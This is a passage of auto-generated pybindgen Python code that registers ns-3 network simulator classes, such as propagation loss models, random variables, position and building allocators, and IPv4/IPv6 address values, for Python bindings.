    ## propagation-loss-model.h (module 'propagation'): double ns3::FixedRssLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
    cls.add_method('DoCalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, visibility='private', is_virtual=True)
    ## propagation-loss-model.h (module 'propagation'): int64_t ns3::FixedRssLossModel::DoAssignStreams(int64_t stream) [member function]
    cls.add_method('DoAssignStreams', 'int64_t', [param('int64_t', 'stream')], visibility='private', is_virtual=True)
    return

def register_Ns3FriisPropagationLossModel_methods(root_module, cls):
    """Register ns3::FriisPropagationLossModel constructors and methods on the pybindgen wrapper *cls* (generated code)."""
    ## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::FriisPropagationLossModel::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## propagation-loss-model.h (module 'propagation'): ns3::FriisPropagationLossModel::FriisPropagationLossModel() [constructor]
    cls.add_constructor([])
    ## propagation-loss-model.h (module 'propagation'): void ns3::FriisPropagationLossModel::SetFrequency(double frequency) [member function]
    cls.add_method('SetFrequency', 'void', [param('double', 'frequency')])
    ## propagation-loss-model.h (module 'propagation'): void ns3::FriisPropagationLossModel::SetSystemLoss(double systemLoss) [member function]
    cls.add_method('SetSystemLoss', 'void', [param('double', 'systemLoss')])
    ## propagation-loss-model.h (module 'propagation'): void ns3::FriisPropagationLossModel::SetMinLoss(double minLoss) [member function]
    cls.add_method('SetMinLoss', 'void', [param('double', 'minLoss')])
    ## propagation-loss-model.h (module 'propagation'): double ns3::FriisPropagationLossModel::GetMinLoss() const [member function]
    cls.add_method('GetMinLoss', 'double', [], is_const=True)
    ## propagation-loss-model.h (module 'propagation'): double ns3::FriisPropagationLossModel::GetFrequency() const [member function]
    cls.add_method('GetFrequency', 'double', [], is_const=True)
    ## propagation-loss-model.h (module 'propagation'): double ns3::FriisPropagationLossModel::GetSystemLoss() const [member function]
    cls.add_method('GetSystemLoss', 'double', [], is_const=True)
    ## propagation-loss-model.h (module 'propagation'): double ns3::FriisPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
    cls.add_method('DoCalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, visibility='private', is_virtual=True)
    ## propagation-loss-model.h (module 'propagation'): int64_t ns3::FriisPropagationLossModel::DoAssignStreams(int64_t stream) [member function]
    cls.add_method('DoAssignStreams', 'int64_t', [param('int64_t', 'stream')], visibility='private', is_virtual=True)
    return

def register_Ns3GammaRandomVariable_methods(root_module, cls):
    """Register ns3::GammaRandomVariable constructors and methods on the pybindgen wrapper *cls* (generated code)."""
    ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::GammaRandomVariable::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## random-variable-stream.h (module 'core'): ns3::GammaRandomVariable::GammaRandomVariable() [constructor]
    cls.add_constructor([])
    ## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetAlpha() const [member function]
    cls.add_method('GetAlpha', 'double', [], is_const=True)
    ## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetBeta() const [member function]
    cls.add_method('GetBeta', 'double', [], is_const=True)
    ## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetValue(double alpha, double beta) [member function]
    cls.add_method('GetValue', 'double', [param('double', 'alpha'), param('double', 'beta')])
    ## random-variable-stream.h (module 'core'): uint32_t ns3::GammaRandomVariable::GetInteger(uint32_t alpha, uint32_t beta) [member function]
    cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'alpha'), param('uint32_t', 'beta')])
    ## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetValue() [member function]
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    ## random-variable-stream.h (module 'core'): uint32_t ns3::GammaRandomVariable::GetInteger() [member function]
    cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True)
    return

def register_Ns3GridBuildingAllocator_methods(root_module, cls):
    """Register ns3::GridBuildingAllocator constructors and methods on the pybindgen wrapper *cls* (generated code)."""
    ## building-allocator.h (module 'buildings'): ns3::GridBuildingAllocator::GridBuildingAllocator(ns3::GridBuildingAllocator const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::GridBuildingAllocator const &', 'arg0')])
    ## building-allocator.h (module 'buildings'): ns3::GridBuildingAllocator::GridBuildingAllocator() [constructor]
    cls.add_constructor([])
    ## building-allocator.h (module 'buildings'): ns3::BuildingContainer ns3::GridBuildingAllocator::Create(uint32_t n) const [member function]
    cls.add_method('Create', 'ns3::BuildingContainer', [param('uint32_t', 'n')], is_const=True)
    ## building-allocator.h (module 'buildings'): static ns3::TypeId ns3::GridBuildingAllocator::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## building-allocator.h (module 'buildings'): void ns3::GridBuildingAllocator::SetBuildingAttribute(std::string n, ns3::AttributeValue const & v) [member function]
    cls.add_method('SetBuildingAttribute', 'void', [param('std::string', 'n'), param('ns3::AttributeValue const &', 'v')])
    return

def register_Ns3GridPositionAllocator_methods(root_module, cls):
    """Register ns3::GridPositionAllocator constructors and methods on the pybindgen wrapper *cls* (generated code)."""
    ## position-allocator.h (module 'mobility'): ns3::GridPositionAllocator::GridPositionAllocator(ns3::GridPositionAllocator const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::GridPositionAllocator const &', 'arg0')])
    ## position-allocator.h (module 'mobility'): ns3::GridPositionAllocator::GridPositionAllocator() [constructor]
    cls.add_constructor([])
    ## position-allocator.h (module 'mobility'): int64_t ns3::GridPositionAllocator::AssignStreams(int64_t stream) [member function]
    cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'stream')], is_virtual=True)
    ## position-allocator.h (module 'mobility'): double ns3::GridPositionAllocator::GetDeltaX() const [member function]
    cls.add_method('GetDeltaX', 'double', [], is_const=True)
    ## position-allocator.h (module 'mobility'): double ns3::GridPositionAllocator::GetDeltaY() const [member function]
    cls.add_method('GetDeltaY', 'double', [], is_const=True)
    ## position-allocator.h (module 'mobility'): ns3::GridPositionAllocator::LayoutType ns3::GridPositionAllocator::GetLayoutType() const [member function]
    cls.add_method('GetLayoutType', 'ns3::GridPositionAllocator::LayoutType', [], is_const=True)
    ## position-allocator.h (module 'mobility'): double ns3::GridPositionAllocator::GetMinX() const [member function]
    cls.add_method('GetMinX', 'double', [], is_const=True)
    ## position-allocator.h (module 'mobility'): double ns3::GridPositionAllocator::GetMinY() const [member function]
    cls.add_method('GetMinY', 'double', [], is_const=True)
    ## position-allocator.h (module 'mobility'): uint32_t ns3::GridPositionAllocator::GetN() const [member function]
    cls.add_method('GetN', 'uint32_t', [], is_const=True)
    ## position-allocator.h (module 'mobility'): ns3::Vector ns3::GridPositionAllocator::GetNext() const [member function]
    cls.add_method('GetNext', 'ns3::Vector', [], is_const=True, is_virtual=True)
    ## position-allocator.h (module 'mobility'): static ns3::TypeId ns3::GridPositionAllocator::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## position-allocator.h (module 'mobility'): void ns3::GridPositionAllocator::SetDeltaX(double deltaX) [member function]
    cls.add_method('SetDeltaX', 'void', [param('double', 'deltaX')])
    ## position-allocator.h (module 'mobility'): void ns3::GridPositionAllocator::SetDeltaY(double deltaY) [member function]
    cls.add_method('SetDeltaY', 'void', [param('double', 'deltaY')])
    ## position-allocator.h (module 'mobility'): void ns3::GridPositionAllocator::SetLayoutType(ns3::GridPositionAllocator::LayoutType layoutType) [member function]
    cls.add_method('SetLayoutType', 'void', [param('ns3::GridPositionAllocator::LayoutType', 'layoutType')])
    ## position-allocator.h (module 'mobility'): void ns3::GridPositionAllocator::SetMinX(double xMin) [member function]
    cls.add_method('SetMinX', 'void', [param('double', 'xMin')])
    ## position-allocator.h (module 'mobility'): void ns3::GridPositionAllocator::SetMinY(double yMin) [member function]
    cls.add_method('SetMinY', 'void', [param('double', 'yMin')])
    ## position-allocator.h (module 'mobility'): void ns3::GridPositionAllocator::SetN(uint32_t n) [member function]
    cls.add_method('SetN', 'void', [param('uint32_t', 'n')])
    return

def register_Ns3HybridBuildingsPropagationLossModel_methods(root_module, cls):
    """Register ns3::HybridBuildingsPropagationLossModel constructors and methods on the pybindgen wrapper *cls* (generated code)."""
    ## hybrid-buildings-propagation-loss-model.h (module 'buildings'): static ns3::TypeId ns3::HybridBuildingsPropagationLossModel::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## hybrid-buildings-propagation-loss-model.h (module 'buildings'): ns3::HybridBuildingsPropagationLossModel::HybridBuildingsPropagationLossModel() [constructor]
    cls.add_constructor([])
    ## hybrid-buildings-propagation-loss-model.h (module 'buildings'): void ns3::HybridBuildingsPropagationLossModel::SetEnvironment(ns3::EnvironmentType env) [member function]
    cls.add_method('SetEnvironment', 'void', [param('ns3::EnvironmentType', 'env')])
    ## hybrid-buildings-propagation-loss-model.h (module 'buildings'): void ns3::HybridBuildingsPropagationLossModel::SetCitySize(ns3::CitySize size) [member function]
    cls.add_method('SetCitySize', 'void', [param('ns3::CitySize', 'size')])
    ## hybrid-buildings-propagation-loss-model.h (module 'buildings'): void ns3::HybridBuildingsPropagationLossModel::SetFrequency(double freq) [member function]
    cls.add_method('SetFrequency', 'void', [param('double', 'freq')])
    ## hybrid-buildings-propagation-loss-model.h (module 'buildings'): void ns3::HybridBuildingsPropagationLossModel::SetRooftopHeight(double rooftopHeight) [member function]
    cls.add_method('SetRooftopHeight', 'void', [param('double', 'rooftopHeight')])
    ## hybrid-buildings-propagation-loss-model.h (module 'buildings'): double ns3::HybridBuildingsPropagationLossModel::GetLoss(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
    cls.add_method('GetLoss', 'double', [param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, is_virtual=True)
    return

def register_Ns3Ipv4AddressChecker_methods(root_module, cls):
    """Register ns3::Ipv4AddressChecker constructors on the pybindgen wrapper *cls* (generated code)."""
    ## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker::Ipv4AddressChecker() [constructor]
    cls.add_constructor([])
    ## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker::Ipv4AddressChecker(ns3::Ipv4AddressChecker const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Ipv4AddressChecker const &', 'arg0')])
    return

def register_Ns3Ipv4AddressValue_methods(root_module, cls):
    """Register ns3::Ipv4AddressValue constructors and methods on the pybindgen wrapper *cls* (generated code)."""
    ## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue() [constructor]
    cls.add_constructor([])
    ## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue(ns3::Ipv4AddressValue const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Ipv4AddressValue const &', 'arg0')])
    ## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue(ns3::Ipv4Address const & value) [constructor]
    cls.add_constructor([param('ns3::Ipv4Address const &', 'value')])
    ## ipv4-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv4AddressValue::Copy() const [member function]
    cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True)
    ## ipv4-address.h (module 'network'): bool ns3::Ipv4AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
    cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True)
    ## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4AddressValue::Get() const [member function]
    cls.add_method('Get', 'ns3::Ipv4Address', [], is_const=True)
    ## ipv4-address.h (module 'network'): std::string ns3::Ipv4AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
    cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True)
    ## ipv4-address.h (module 'network'): void ns3::Ipv4AddressValue::Set(ns3::Ipv4Address const & value) [member function]
    cls.add_method('Set', 'void', [param('ns3::Ipv4Address const &', 'value')])
    return

def register_Ns3Ipv4MaskChecker_methods(root_module, cls):
    """Register ns3::Ipv4MaskChecker constructors on the pybindgen wrapper *cls* (generated code)."""
    ## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker::Ipv4MaskChecker() [constructor]
    cls.add_constructor([])
    ## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker::Ipv4MaskChecker(ns3::Ipv4MaskChecker const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Ipv4MaskChecker const &', 'arg0')])
    return

def register_Ns3Ipv4MaskValue_methods(root_module, cls):
    """Register ns3::Ipv4MaskValue constructors and methods on the pybindgen wrapper *cls* (generated code)."""
    ## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue() [constructor]
    cls.add_constructor([])
    ## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue(ns3::Ipv4MaskValue const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Ipv4MaskValue const &', 'arg0')])
    ## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue(ns3::Ipv4Mask const & value) [constructor]
    cls.add_constructor([param('ns3::Ipv4Mask const &', 'value')])
    ## ipv4-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv4MaskValue::Copy() const [member function]
    cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True)
    ## ipv4-address.h (module 'network'): bool ns3::Ipv4MaskValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
    cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True)
    ## ipv4-address.h (module 'network'): ns3::Ipv4Mask ns3::Ipv4MaskValue::Get() const [member function]
    cls.add_method('Get', 'ns3::Ipv4Mask', [], is_const=True)
    ## ipv4-address.h (module 'network'): std::string ns3::Ipv4MaskValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
    cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True)
    ## ipv4-address.h (module 'network'): void ns3::Ipv4MaskValue::Set(ns3::Ipv4Mask const & value) [member function]
    cls.add_method('Set', 'void', [param('ns3::Ipv4Mask const &', 'value')])
    return

def register_Ns3Ipv6AddressChecker_methods(root_module, cls):
    """Register ns3::Ipv6AddressChecker constructors on the pybindgen wrapper *cls* (generated code)."""
    ## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker::Ipv6AddressChecker() [constructor]
    cls.add_constructor([])
    ## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker::Ipv6AddressChecker(ns3::Ipv6AddressChecker const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Ipv6AddressChecker const &', 'arg0')])
    return

def register_Ns3Ipv6AddressValue_methods(root_module, cls):
    """Register ns3::Ipv6AddressValue constructors and methods on the pybindgen wrapper *cls* (generated code)."""
    ## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue() [constructor]
    cls.add_constructor([])
    ## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue(ns3::Ipv6AddressValue const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Ipv6AddressValue const &', 'arg0')])
    ## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue(ns3::Ipv6Address const & value) [constructor]
    cls.add_constructor([param('ns3::Ipv6Address const &', 'value')])
    ## ipv6-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv6AddressValue::Copy() const [member function]
    cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True)
    ## ipv6-address.h (module 'network'): bool ns3::Ipv6AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
    cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True)
    ## ipv6-address.h (module 'network'): ns3::Ipv6Address ns3::Ipv6AddressValue::Get() const [member function]
    cls.add_method('Get', 'ns3::Ipv6Address', [], is_const=True)
    ## ipv6-address.h (module 'network'): std::string ns3::Ipv6AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
    cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True)
    ## ipv6-address.h (module 'network'): void ns3::Ipv6AddressValue::Set(ns3::Ipv6Address const & value) [member function]
    cls.add_method('Set', 'void', [param('ns3::Ipv6Address const &', 'value')])
    return

def register_Ns3Ipv6PrefixChecker_methods(root_module, cls):
    """Register ns3::Ipv6PrefixChecker constructors on the pybindgen wrapper *cls* (generated code)."""
    ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker::Ipv6PrefixChecker() [constructor]
    cls.add_constructor([])
    ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker::Ipv6PrefixChecker(ns3::Ipv6PrefixChecker const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Ipv6PrefixChecker const &', 'arg0')])
    return

def register_Ns3Ipv6PrefixValue_methods(root_module, cls):
    """Register ns3::Ipv6PrefixValue constructors and methods on the pybindgen wrapper *cls* (generated code)."""
    ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue() [constructor]
    cls.add_constructor([])
    ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue(ns3::Ipv6PrefixValue const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Ipv6PrefixValue const &', 'arg0')])
    ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue(ns3::Ipv6Prefix const & value) [constructor]
    cls.add_constructor([param('ns3::Ipv6Prefix const &', 'value')])
    ## ipv6-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv6PrefixValue::Copy() const [member function]
    cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True)
    ## ipv6-address.h (module 'network'): bool ns3::Ipv6PrefixValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
    cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True)
    ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix ns3::Ipv6PrefixValue::Get() const [member function]
    cls.add_method('Get', 'ns3::Ipv6Prefix', [], is_const=True)
    ## ipv6-address.h (module 'network'): std::string ns3::Ipv6PrefixValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
    cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True)
    ## ipv6-address.h (module 'network'): void ns3::Ipv6PrefixValue::Set(ns3::Ipv6Prefix const & value) [member function]
    cls.add_method('Set', 'void', [param('ns3::Ipv6Prefix const &', 'value')])
    return

def register_Ns3ItuR1238PropagationLossModel_methods(root_module, cls):
    """Register ns3::ItuR1238PropagationLossModel constructors and methods on the pybindgen wrapper *cls* (generated code)."""
    ## itu-r-1238-propagation-loss-model.h (module 'buildings'): ns3::ItuR1238PropagationLossModel::ItuR1238PropagationLossModel() [constructor]
    cls.add_constructor([])
    ## itu-r-1238-propagation-loss-model.h (module 'buildings'): static ns3::TypeId ns3::ItuR1238PropagationLossModel::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## itu-r-1238-propagation-loss-model.h (module 'buildings'): double ns3::ItuR1238PropagationLossModel::GetLoss(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
    cls.add_method('GetLoss', 'double', [param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True)
    ## itu-r-1238-propagation-loss-model.h (module 'buildings'): double ns3::ItuR1238PropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
    cls.add_method('DoCalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, visibility='private', is_virtual=True)
    ## itu-r-1238-propagation-loss-model.h (module 'buildings'): int64_t ns3::ItuR1238PropagationLossModel::DoAssignStreams(int64_t stream) [member function]
    cls.add_method('DoAssignStreams', 'int64_t', [param('int64_t', 'stream')], visibility='private', is_virtual=True)
    return

def register_Ns3ListPositionAllocator_methods(root_module, cls):
    """Register ns3::ListPositionAllocator constructors and methods on the pybindgen wrapper *cls* (generated code)."""
    ## position-allocator.h (module 'mobility'): ns3::ListPositionAllocator::ListPositionAllocator(ns3::ListPositionAllocator const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::ListPositionAllocator const &', 'arg0')])
    ## position-allocator.h (module 'mobility'): ns3::ListPositionAllocator::ListPositionAllocator() [constructor]
    cls.add_constructor([])
    ## position-allocator.h (module 'mobility'): void ns3::ListPositionAllocator::Add(ns3::Vector v) [member function]
    cls.add_method('Add', 'void', [param('ns3::Vector', 'v')])
    ## position-allocator.h (module 'mobility'): int64_t ns3::ListPositionAllocator::AssignStreams(int64_t stream) [member function]
    cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'stream')], is_virtual=True)
    ## position-allocator.h (module 'mobility'): ns3::Vector ns3::ListPositionAllocator::GetNext() const [member function]
    cls.add_method('GetNext', 'ns3::Vector', [], is_const=True, is_virtual=True)
    ## position-allocator.h (module 'mobility'): static ns3::TypeId ns3::ListPositionAllocator::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    return

def register_Ns3LogDistancePropagationLossModel_methods(root_module, cls):
    """Register ns3::LogDistancePropagationLossModel constructors and methods on the pybindgen wrapper *cls* (generated code)."""
    ## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::LogDistancePropagationLossModel::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## propagation-loss-model.h (module 'propagation'): ns3::LogDistancePropagationLossModel::LogDistancePropagationLossModel() [constructor]
    cls.add_constructor([])
    ## propagation-loss-model.h (module 'propagation'): void ns3::LogDistancePropagationLossModel::SetPathLossExponent(double n) [member function]
    cls.add_method('SetPathLossExponent', 'void', [param('double', 'n')])
    ## propagation-loss-model.h (module 'propagation'): double ns3::LogDistancePropagationLossModel::GetPathLossExponent() const [member function]
    cls.add_method('GetPathLossExponent', 'double', [], is_const=True)
    ## propagation-loss-model.h (module 'propagation'): void ns3::LogDistancePropagationLossModel::SetReference(double referenceDistance, double referenceLoss) [member function]
    cls.add_method('SetReference', 'void', [param('double', 'referenceDistance'), param('double', 'referenceLoss')])
    ## propagation-loss-model.h (module 'propagation'): double ns3::LogDistancePropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
    cls.add_method('DoCalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, visibility='private', is_virtual=True)
    ## propagation-loss-model.h (module 'propagation'): int64_t ns3::LogDistancePropagationLossModel::DoAssignStreams(int64_t stream) [member function]
    cls.add_method('DoAssignStreams', 'int64_t', [param('int64_t', 'stream')], visibility='private', is_virtual=True)
    return

def register_Ns3LogNormalRandomVariable_methods(root_module, cls):
    """Register ns3::LogNormalRandomVariable constructors and methods on the pybindgen wrapper *cls* (generated code)."""
    ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::LogNormalRandomVariable::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## random-variable-stream.h (module 'core'): ns3::LogNormalRandomVariable::LogNormalRandomVariable() [constructor]
    cls.add_constructor([])
    ## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetMu() const [member function]
    cls.add_method('GetMu', 'double', [], is_const=True)
    ## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetSigma() const [member function]
    cls.add_method('GetSigma', 'double', [], is_const=True)
    ## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetValue(double mu, double sigma) [member function]
    cls.add_method('GetValue', 'double', [param('double', 'mu'), param('double', 'sigma')])
    ## random-variable-stream.h (module 'core'): uint32_t ns3::LogNormalRandomVariable::GetInteger(uint32_t mu, uint32_t sigma) [member function]
    cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'mu'), param('uint32_t', 'sigma')])
    ## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetValue() [member function]
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    ## random-variable-stream.h (module 'core'): uint32_t ns3::LogNormalRandomVariable::GetInteger() [member function]
    cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True)
    return

def register_Ns3MatrixPropagationLossModel_methods(root_module, cls):
    """Register ns3::MatrixPropagationLossModel constructors and methods on the pybindgen wrapper *cls* (generated code)."""
    ## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::MatrixPropagationLossModel::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## propagation-loss-model.h (module 'propagation'): ns3::MatrixPropagationLossModel::MatrixPropagationLossModel() [constructor]
    cls.add_constructor([])
    ## propagation-loss-model.h (module 'propagation'): void ns3::MatrixPropagationLossModel::SetLoss(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b, double loss, bool symmetric=true) [member function]
    cls.add_method('SetLoss', 'void', [param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b'), param('double', 'loss'), param('bool', 'symmetric', default_value='true')])
    ## propagation-loss-model.h (module 'propagation'): void ns3::MatrixPropagationLossModel::SetDefaultLoss(double defaultLoss) [member function]
    cls.add_method('SetDefaultLoss', 'void', [param('double', 'defaultLoss')])
    ## propagation-loss-model.h (module 'propagation'): double ns3::MatrixPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
    cls.add_method('DoCalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, visibility='private', is_virtual=True)
    ## propagation-loss-model.h (module 'propagation'): int64_t ns3::MatrixPropagationLossModel::DoAssignStreams(int64_t stream) [member function]
    cls.add_method('DoAssignStreams', 'int64_t', [param('int64_t', 'stream')], visibility='private', is_virtual=True)
    return

def register_Ns3MobilityBuildingInfo_methods(root_module, cls):
    """Register ns3::MobilityBuildingInfo constructors and methods on the pybindgen wrapper *cls* (generated code)."""
    ## mobility-building-info.h (module 'buildings'): ns3::MobilityBuildingInfo::MobilityBuildingInfo(ns3::MobilityBuildingInfo const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::MobilityBuildingInfo const &', 'arg0')])
    ## mobility-building-info.h (module 'buildings'): ns3::MobilityBuildingInfo::MobilityBuildingInfo() [constructor]
    cls.add_constructor([])
## mobility-building-info.h (module 'buildings'): ns3::MobilityBuildingInfo::MobilityBuildingInfo(ns3::Ptr<ns3::Building> building) [constructor] cls.add_constructor([param('ns3::Ptr< ns3::Building >', 'building')]) ## mobility-building-info.h (module 'buildings'): ns3::Ptr<ns3::Building> ns3::MobilityBuildingInfo::GetBuilding() [member function] cls.add_method('GetBuilding', 'ns3::Ptr< ns3::Building >', []) ## mobility-building-info.h (module 'buildings'): uint8_t ns3::MobilityBuildingInfo::GetFloorNumber() [member function] cls.add_method('GetFloorNumber', 'uint8_t', []) ## mobility-building-info.h (module 'buildings'): uint8_t ns3::MobilityBuildingInfo::GetRoomNumberX() [member function] cls.add_method('GetRoomNumberX', 'uint8_t', []) ## mobility-building-info.h (module 'buildings'): uint8_t ns3::MobilityBuildingInfo::GetRoomNumberY() [member function] cls.add_method('GetRoomNumberY', 'uint8_t', []) ## mobility-building-info.h (module 'buildings'): static ns3::TypeId ns3::MobilityBuildingInfo::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## mobility-building-info.h (module 'buildings'): bool ns3::MobilityBuildingInfo::IsIndoor() [member function] cls.add_method('IsIndoor', 'bool', []) ## mobility-building-info.h (module 'buildings'): bool ns3::MobilityBuildingInfo::IsOutdoor() [member function] cls.add_method('IsOutdoor', 'bool', []) ## mobility-building-info.h (module 